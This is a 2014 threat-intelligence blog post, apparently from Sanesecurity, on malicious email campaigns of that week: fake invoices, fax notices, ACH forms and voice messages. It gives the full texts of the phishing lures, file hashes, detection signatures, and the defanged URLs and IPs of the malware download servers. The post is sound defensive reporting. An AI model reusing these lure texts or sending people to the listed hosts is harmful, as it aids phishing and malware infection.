Date/Time: Thu, 11 Dec 2014 03:17:44 -0800
Speed: 4924bps
Connection time: 00:06
Pages: 9
Resolution: Normal
Remote ID: 372-573-3700
Line number: 8
DTMF/DID:
Description: Internal Docs

Fax message attached in DOC format (Microsoft Word).

********************************************************* 


FaxMessage47412-872321.doc

One version at the moment... hash: 56b2227ce5ce8e82eb93e70191a5efaf

VirusTotal reports [1/56] virus scanners are hitting on the hash.

Sanesecurity.Rogue.0hr.20141211-1227 is currently blocking this one

word doc macro malware: UK Fuels E-bill

Another day and another word doc "invoice" containing a macro, which if run will start downloading
malware from various servers around the globe.

The current run format is from a forged "UK Fuels" template:

From: invoices@ebillinvoice.com
To: user@xxxxxxxxxx.co.uk
Subject: UK Fuels E-bill

Customer No :        35056
Email address :         user@xxxxxxxxxx.co.uk
Attached file name :    35056_49_2014.doc


Dear Customer

Please find attached your invoice for Week 49 2014.

In order to open the attached DOC file you will need
the software Microsoft Office Word.

If you have any queries regarding your e-bill you can contact us at invoices@ebillinvoice.com.
Yours sincerely

Customer Services
UK Fuels Ltd

The 35056_49_2014.doc seems to have two variants at the moment, current detected [0/56] at VirusTotal:


Hashes:

522ec80ccddfdff0095939798d4b1a18
9e009cf97565e47506195bc05f2c3f03


Currently 0 hour detected as: Sanesecurity.Malware.24631.XlsHeur.UNOFFICIAL

Cheers,

Steve
sanesecurity.com

Wednesday, 10 December 2014

Fake ACH Bank account information form

Busy malware day today... another new one just arriving...

From: "Josiah Nickerson"
Subject: ACH - Bank account information form

Please fill out and return the attached ACH form along with a copy of a voided check.

Josiah Nickerson,

JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor
Fax-602-221-2251
Josiah.Nickerson@jpmchase.com
GRE Project Accounting


Email comes with a Check_Copy_Void.zip attachment (hash: 501f2cc2cf1e7f5c7bdc795070f33321)
which contains a Check_Copy_Void.scr malware

VirusTotal Report [7/56]

You have received a new fax malware (zip)

Another malware fax run, which says it's a pdf file but really it's a zip file, containing an exe attachment:

From: "INTERNAL FAX"
Subject: You have received a new fax

You have received fax from EPSON06789041 at newxxxxxxxx.co.uk

Scan date: Wed, 10 Dec 2014 13:14:17 -0700

Number of page(s): 10

Resolution: 400x400 DPI

Name: fax187498127.pdf

_________________________________
Attached file is scanned image in PDF format.



The attachment is: fax4189052.exe (hash: ef7331bc368ae1e5acddd637ab33a352)

VirusTotal result so far...[4/56]

new photo malware

Received some emails saying that I've got to look at a new photo...


hi my new photo :) if u like my photo send me u




.... lovely.... except... it contains a zip attachment... my_photo.zip

Inside the zip file is a poor attempt at filename hiding...

my_photo_home_38472398472398749283.exe

Here's the current scanner situation..

VirusTotal Results 17/56 (df0620c00068fc83a539d95fda4bbb7f)


Voice redirected message malware

Received a few of these today....

Date: Wed, 10 Dec 2014 13:49:50 +0000
From: "Message Admin" dropibox.com
>
To: enquiries@xxxxxxxxxx.co.uk
Subject: Voice Message
Message-ID: <0298040680 span="" style="color: red;">dropibox.com>
X-Sender: admin@dropibox.com
User-Agent: Roundcube Webmail/1.0.1

Voice redirected message
http://offroadshop DOT sk/dropbox/invoice1
Sent: Wed, 10 Dec 2014 13:49:50 +0000

Note: the letter i in the dropbox name... dropibox.com

Needless to say, the clickable link delivers malware.

XLS Macro malware: K J Watking & Co

Another run of the faked  K J Watking & Co, containing an XLS spreadsheet... BAC439622TB.xls (example name) which has Macro based malware inside it....


Please find attached a remittance advice for recent BACS payment.
Any queries please contact us.
Heath David
Senior Accounts Payable Specialist
K J Watking & Co
Tel: 01469 432377
 Interestingly they've used the same malware XLS has the earlier post today and just renamed it...

eg.

This malware run: BAC998947HJ.xls (hash: 061930c8fc246872dda3af5670d3ea44)
Ealier malware run: ID_00477M.xls: (hash: 061930c8fc246872dda3af5670d3ea44)
All varients were zero hour (0 hour) detected by:

Sanesecurity.Malware.24631.XlsHeur (phish.ndb)
and  Additionally Sanesecurity.Rogue.0hr.20141210-1026 (rogue.hdb)

Update:

Since the macro malware downloads an exe... it's interesting to see how many times
the malware exe file has actually succeeded  in being downloaded:

73,655 -- http://217 DOT 174 DOT 240 DOT 46 :8080/stat/stati.php
73,672 -- http://187 DOT 33 DOT 2 DOT 211 :8080/stat/stati.php

That's a few infected pc's there :(

Cheers,
Steve
Sanesecurity